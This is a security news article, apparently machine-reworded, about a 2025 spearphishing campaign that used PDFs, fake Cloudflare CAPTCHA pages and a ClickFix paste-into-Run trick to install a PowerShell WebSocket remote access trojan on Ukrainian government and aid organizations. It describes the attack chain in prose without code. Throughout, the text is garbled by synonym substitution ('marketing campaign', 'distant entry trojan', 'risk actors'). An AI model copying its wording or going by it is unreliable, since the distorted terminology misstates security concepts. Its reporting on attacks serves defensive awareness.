A complicated spearphishing marketing campaign has emerged focusing on humanitarian organizations and Ukrainian authorities companies, leveraging weaponized PDF attachments and pretend Cloudflare verification pages to distribute a harmful WebSocket-based distant entry trojan.
The operation, first uncovered in early October 2025, demonstrates a exceptional degree of operational planning and infrastructure compartmentalization, with the risk actors sustaining their marketing campaign for six months earlier than executing their strike.
The marketing campaign particularly focused members of the Worldwide Purple Cross, Norwegian Refugee Council, UNICEF, and regional authorities administrations throughout Ukraine, utilizing emails impersonating the Ukrainian President’s Workplace.
When recipients opened the malicious PDF and clicked the embedded hyperlink, they had been directed to a convincing pretend Cloudflare DDoS safety gateway that seemed to be a respectable safety verification web page.
PDF doc web page (Supply – SentinelLABS)
The attackers had registered the area zoomconference.app to imitate a respectable Zoom convention service, internet hosting the malicious infrastructure on Russian-owned VPS servers in Finland.
The sophistication of this operation extends past its preliminary deception techniques. SentinelLABS researchers recognized that the attackers maintained their infrastructure for under 24 hours earlier than shutting down the public-facing domains whereas preserving their backend command-and-control servers, demonstrating professional-grade operational safety.
The marketing campaign infrastructure timeline revealed the attackers started operations in March 2025, with SSL certificates issued in September, suggesting meticulous preparation earlier than the October strike.
The ClickFix An infection Mechanism and Multi-Stage Payload Supply
The core of PhantomCaptcha’s effectiveness lies in its implementation of the ClickFix social engineering approach, a technique more and more adopted by risk actors since mid-2024.
After the pretend Cloudflare web page masses, victims encounter a simulated reCAPTCHA interface with an “I’m not a robotic” checkbox.
Clicking this checkbox triggers a popup containing directions written in Ukrainian, directing customers to repeat a token and paste it into the Home windows Run dialog utilizing the keyboard shortcut Home windows+R.
This seemingly innocuous motion executes malicious PowerShell code that initiates the an infection chain.
An infection paths (Supply – SentinelLABS)
The underlying mechanism depends on a JavaScript perform named copyToken() that downloads and executes a PowerShell script.
The attackers distributed three phases of payloads, starting with a closely obfuscated 500KB PowerShell downloader that obscured easy obtain performance via large code obfuscation strategies.
The second stage carried out complete system reconnaissance, gathering laptop names, area data, usernames, course of IDs, and {hardware} identifiers via system UUID retrieval, encrypting this knowledge utilizing a hardcoded XOR key earlier than transmission.
The ultimate payload delivered a WebSocket-based distant entry trojan able to receiving arbitrary instructions encoded in Base64-formatted JSON messages.
This light-weight backdoor related to distant servers and executed instructions utilizing PowerShell’s Invoke-Expression cmdlet, granting attackers full distant command execution capabilities and knowledge exfiltration entry.
The malware disabled PowerShell command historical past logging to stop forensic evaluation, representing a deliberate effort to cowl operational tracks whereas sustaining persistent entry to compromised methods.
Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most popular Supply in Google.
